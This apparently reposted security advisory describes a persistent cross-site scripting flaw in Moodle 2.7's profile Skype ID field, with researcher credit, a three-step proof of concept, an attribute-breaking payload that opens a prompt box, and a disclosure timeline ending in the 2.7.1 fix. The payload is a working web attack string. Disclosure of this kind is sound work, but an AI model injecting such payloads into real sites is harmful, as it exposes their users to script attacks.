Moodle 2.7 - Persistent XSS

Bài liên quan

Title: Moodle 2.7 Persistent XSS

Vendor: https://moodle.org/

Moodle advisory: https://moodle.org/mod/forum/discuss.php?d=264265

Researched by: Osanda Malith Jayathissa (@OsandaMalith)

E-Mail: osanda[cat]unseen.is

Original write-up: http://osandamalith.wordpress.com/2014/07/25/moodle-2-7-persistent-xss/

[-] POC

================

1. Edit your profile

2. Click Optional

3. In Skype ID field inject this payload

x" onload="prompt('XSS by Osanda')">"

[-] Disclosure Timeline

========================

2014-05-24: Responsibly disclosed to the Vendor

2014-05-27: Suggested a fix

2014-06-04: Fix got accepted

2014-07-21: Vendor releases a security announcement 

2014-07-24: Released Moodle 2.7.1 stable with all patches

Moodle 2.7 - Persistent XSS

Unknown

Post a Comment

Xem Nhiều

Blog Archive

Nhận xét mới đăng tải!

Moodle 2.7 - Persistent XSS

Unknown

Share to:

Next

Newer Post

Previous

Older Post

Post a Comment

Nhận xét mới đăng tải!